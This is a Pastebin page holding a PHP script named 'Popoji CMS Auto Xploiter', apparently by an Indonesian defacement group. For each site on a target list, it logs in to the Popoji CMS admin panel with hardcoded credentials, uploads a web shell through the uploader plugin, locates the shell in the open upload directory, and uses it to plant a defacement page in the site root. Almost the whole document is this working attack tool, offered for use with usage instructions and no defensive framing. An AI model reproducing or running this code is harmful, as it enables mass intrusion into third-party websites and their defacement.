API tools faq
paste
Advertisement
AgusSR

Popoji CMS Auto Xploiter

AgusSR
Aug 1st, 2016
2,168
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.08 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. function login($url,$user,$pass) {
  6.     $post_login = array(
  7.         "mod" => "login",
  8.         "act" => "proclogin",
  9.         "username" => $user,
  10.         "password" => $pass,
  11.         );
  12.     $ch = curl_init();
  13.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  14.           curl_setopt($ch, CURLOPT_URL, $url."/po-admin/login.php");
  15.           curl_setopt($ch, CURLOPT_POST, true);
  16.           curl_setopt($ch, CURLOPT_POSTFIELDS, $post_login);
  17.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  18.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  19.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  20.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  21.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  22.           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  23.     return curl_exec($ch);
  24.           curl_close($ch);
  25. }
  26. function ch($url,$post) {
  27.     $ch = curl_init($url);
  28.     if($post !=null) {
  29.           curl_setopt($ch, CURLOPT_POST, true);
  30.           curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  31.     }
  32.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  33.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  34.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  35.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  36.           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  37.           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  38.     return curl_exec($ch);
  39.           curl_close($ch);
  40. }
  41. function cek($url) {
  42.     $ch = curl_init($url);
  43.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  44.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  45.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  46.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  47.           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  48.           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  49.     return curl_exec ($ch);
  50.           curl_close($ch);
  51. }
  52. function cover() {
  53.     echo "<--------------------><-------------------->\n";
  54.     echo "[ Popoji CMS Auto Xploiter ]\n";
  55.     echo "// Coded by Mr. Error 404 ft. tu5b0l3d - IndoXploit //\n";
  56.     echo "cara pake: php popoji.php [list_target.txt] [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n";
  57.     echo "contoh: php popoji.php target.txt indoxloit.jpg indoxploit.php deface.html\n";
  58.     echo "<--------------------><-------------------->\n\n\n";
  59. }
  60. $username_popoji = "indoxploit"; // ganti dengan username kalian.
  61. $password_popoji = "indoxploit"; // ganti dengan paasword kalian.
  62. $sites = explode("\n", file_get_contents($argv[1]));
  63. $shell = $argv[2];
  64. $nama_shell = $argv[3];
  65. $deface = $argv[4];
  66. $pecah = explode(".", $nama_shell);
  67. $nama = $pecah[0];
  68. $ext = $pecah[1];
  69. if(isset($sites) AND isset($shell) AND isset($nama_shell) AND isset($deface)) {
  70.     cover();
  71.     foreach($sites as $url) {
  72.         echo "[+] Nyecan: $url\n";
  73.         $login = login($url, $username_popoji, $password_popoji);
  74.         if(preg_match("/beranda|keluar|selamat datang|member|admin/i", $login)) {
  75.             echo "[+] Login OK\n";
  76.             $post_upload = array(
  77.                 "file" => "@$shell",
  78.                 "name" => $nama_shell,
  79.                 );
  80.             ch($url."/po-admin/js/plugins/uploader/upload.php", $post_upload);
  81.             $cek_folder = cek("$url/po-content/po-upload/");
  82.             if(preg_match("/Index of \/po-content\/po-upload/", $cek_folder) AND !preg_match("/403/", $cek_folder)) {
  83.                 preg_match("/<li><a href=\"$nama-(.*?)-polibrary.$ext\">/", $cek_folder, $shellmu);
  84.                 $shellmu[1] = "$nama-".$shellmu[1]."-polibrary.$ext";
  85.                 $link_shell = $url."/po-content/po-upload/".$shellmu[1];
  86.                 echo "[+] Shellmu: $link_shell\n";
  87.                 $post_deface = array(
  88.                     "tipe_upload" => "home_root",
  89.                     "ix_file" => "@$deface",
  90.                     "upload" => "upload",
  91.                     );
  92.                 $depes = ch($link_shell."?do=upload", $post_deface);
  93.                 if(preg_match("/uploaded!/i", $depes) AND preg_match("/hacked/i", cek("$url/$deface"))) {
  94.                     echo "[+] Sukses Depes! -> $url/$deface\n\n";
  95.                 } else {
  96.                     echo "[-] Gagal Depes!!\n\n";
  97.                 }
  98.             } else {
  99.                 echo "[+] Lokasi Shellnya forbidden / kena tebas gann :(\n\n";
  100.             }
  101.         } else {
  102.             echo "[+] Login Gagal\n\n";
  103.         }
  104.     }
  105. } else {
  106.     echo "cara pake: php ".$argv[0]." [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n";
  107.     echo "contoh: php ".$argv[0]." shell.jpg indoxploit.php deface.html\n";
  108. }
  109. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!